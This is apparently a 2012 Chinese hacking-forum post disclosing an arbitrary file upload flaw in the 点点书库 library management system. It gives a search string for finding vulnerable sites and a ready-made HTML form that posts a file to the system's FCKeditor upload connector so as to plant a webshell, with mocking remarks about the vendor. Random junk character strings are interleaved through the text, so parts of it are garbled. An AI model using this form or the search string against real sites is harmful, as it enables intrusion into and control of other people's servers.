主题:图书馆系统任意文件上传漏洞
0 K/ ?: J7 }5 J 作者:冰锋刺客
7 u% _4 Z$ c* ~, T 厂商:点击书(dianjishu.com)
% a6 V3 A' l3 I+ T 日期:2012-6-21
( V: n6 H b5 r; } d& [$ Z- }% w6 b
: v. F. l$ g- N& O7 Y" RI 概述
% O2 g) A: g" g( ~" U$ V 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
- J1 Y/ { H' m l4 F0 @/ Y II 简介
. R9 D: b1 w3 S& Q* ^ 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
& H" z- x* @6 F2 u) { 补充一个漏洞: T, X0 q/ B% J: d: z4 g- c" k" j
<form id="frmUpload" enctype="multipart/form-data"3 A- U* Q9 H O; o+ C' E
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>: ]7 n+ @2 @4 q* {
<input id="btnUpload" type="submit" value="操翻他">
% V% s* r; S! z/ Y V" Z </form>
; c$ \$ Z( v5 t. U 你们懂的3 M! ~8 M/ E0 y9 y( U& T9 f' Y
那傻逼提供还需要改包.1 S) Q. C" \3 h$ s, |9 r
自己看了下源代码发现fckeditor& a$ J N+ S/ m' A \- Y/ W
直接秒杀0 y0 q; A8 ~1 O9 w' E. {& J/ |
|
发表于 2012-9-10 21:20:59
收藏
支持
反对